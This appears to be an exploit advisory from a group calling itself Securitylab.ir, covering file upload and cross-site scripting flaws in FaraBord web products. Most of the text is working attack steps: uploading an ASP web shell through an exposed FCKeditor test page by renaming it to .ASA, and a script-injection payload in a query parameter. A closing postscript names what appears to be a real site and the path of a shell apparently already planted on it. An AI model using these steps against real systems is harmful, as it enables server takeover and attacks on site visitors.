FaraBord Product's suffer from cross site scripting and shell upload vulnerabilities.
ce94e78feb1e3411d42dee6ec3808c57a24cdbd461f4deab98e71287993585f1
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: FaraBord Product's
# Vendor: http://farabord.com
#################################################################
# Vulnerability Info:
# Type: Remote Arbitrary File Upload,XSS
# Risk: High
#################################################################
[Remote File Upload]:
http://site.ir/fckeditor/editor/filemanager/upload/test.html
Shell.asp > Rename to > Shell.ASA
Uploaded Here:
http://site.ir//files/filebox/Shell.asa
[XSS]:
http://site.ir/VisitorPages/show.aspx?IsDetailList=true&ItemID=%3Cscript%3E%28/xss/%29%3C/script%3E
#################################################################
# Vulnerable Products: All Products
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: info[AT]Securitylab[Dot]ir,whh_iran[AT]yahoo[Dot]com
###################################################################
PS: Exploit-db Please Don't Attach live site in exploit ,thanks ;)
http://www.pmha.ir/fckeditor/editor/filemanager/upload/test.html
http://www.pmha.ir/files/filebox/z.asa